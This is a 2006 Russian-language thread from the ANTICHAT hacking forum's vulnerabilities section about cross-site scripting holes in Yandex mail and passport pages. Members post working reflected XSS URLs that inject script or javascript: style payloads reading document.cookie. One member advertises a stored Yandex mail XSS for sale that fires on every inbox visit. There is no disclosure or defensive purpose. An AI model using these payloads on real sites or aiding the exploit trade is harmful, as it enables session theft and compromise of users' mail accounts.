HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

mail.yandex.ru passive xss
  #1  
Старый 05.11.2006, 05:36
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
С нами: 10925666

Репутация: 454
По умолчанию mail.yandex.ru passive xss

Вот, наткнулся... Т.к. пассивная, выкладываю сюда.
Совершенно ничего не фильтруется, вообщем good

Цитата:
-http://mail.yandex.ru/colabook_formaddp?name="><script>alert(document.co okie)</script>
+ один товарищ тут продает нечто подобное.

З.Ы. Почему бы не закрепить yandex и rambler в этом разделе, т.к. это уже сделано с mail.ru?
 
Ответить с цитированием

  #2  
Старый 05.11.2006, 12:56
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
С нами: 10925666

Репутация: 454
По умолчанию

Это уже на ваше усмотрение - хотите, переносите...
Выложил сюда, только из-за того, что это продается.
 
Ответить с цитированием

  #3  
Старый 05.11.2006, 14:10
Mobile
Регистрация: 18.02.2006
Сообщений: 1,090
С нами: 10644806

Репутация: 1564


По умолчанию

Надо было в паблик выложить, испортить тому барыге бизнес
 
Ответить с цитированием

  #4  
Старый 08.11.2006, 11:18
Elekt
Banned
Регистрация: 05.12.2005
Сообщений: 982
С нами: 10752806

Репутация: 1202


По умолчанию

=) хехе
 
Ответить с цитированием

  #5  
Старый 08.11.2006, 13:14
=Be$=
Постоянный
Регистрация: 21.01.2006
Сообщений: 310
С нами: 10685126

Репутация: 237
По умолчанию

Как я помню он ее за 25уе продовал)))
 
Ответить с цитированием

  #6  
Старый 11.11.2006, 21:46
Pionep
Новичок
Регистрация: 04.11.2006
Сообщений: 3
С нами: 10272493

Репутация: 0
По умолчанию

Цитата:
Сообщение от VectorG  
один товарищ тут продает нечто подобное.
Продаваемая мною бага НЕ ИЗВЕСТНА НИКОМУ!
С выше написанной уязвимостью не имеет никакой связи.
Работает в другом направлении.

+ к этому скрипт, приготовленный для жертвы, будет выполняться каждый раз при заходе на страницу входящих сообщений.

С учётом того, что наконец пройдена проверка Гарантом, ПОКУПАЕМ!
 
Ответить с цитированием

  #7  
Старый 11.11.2006, 23:07
Pionep
Новичок
Регистрация: 04.11.2006
Сообщений: 3
С нами: 10272493

Репутация: 0
По умолчанию

Как работает выше написанная бага?
В двух проверенных браузерах, "><script>alert(document.cookie)</script> аккуратно распечатывается в форме
 
Ответить с цитированием

  #8  
Старый 11.11.2006, 23:18
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
С нами: 10467686

Репутация: 930


По умолчанию

Наверно уже прикрыли, не пашет ни на ie, ни в myie.
 
Ответить с цитированием

  #9  
Старый 23.12.2006, 23:44
_Great_
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
С нами: 10721066

Репутация: 4360


По умолчанию

IE:
Код:
http://passport.yandex.ru/passport?mode=register&ncrnd=&step=one&confirmed=yes&idkey=&filled=yes&login=qwerty%22%20style='background:url(javascript:alert(document.cookie))'
правда глюки есть некоторые%)
 
Ответить с цитированием

  #10  
Старый 28.12.2006, 02:39
MyNick
Познающий
Регистрация: 18.09.2006
Сообщений: 40
С нами: 10339690

Репутация: 3
По умолчанию

Ребята, короче вот http://ifolder.ru/735692 и вот http://ifolder.ru/735710 потом скажите мне пожалуста что вы об этом думаете !??
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
IPB 2.1.7 passive XSS degeneration x Уязвимости CMS / форумов 20 24.02.2007 00:02
Passive Xss на www.tgu.ru (почтовик) _kREveDKo_ Уязвимости 0 31.05.2006 00:09
XSS на Yandex.RU Gang100 Уязвимости 19 09.04.2006 16:42
Xss на yandex.ru Pridu_ROCK Уязвимости 1 04.03.2006 01:08



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...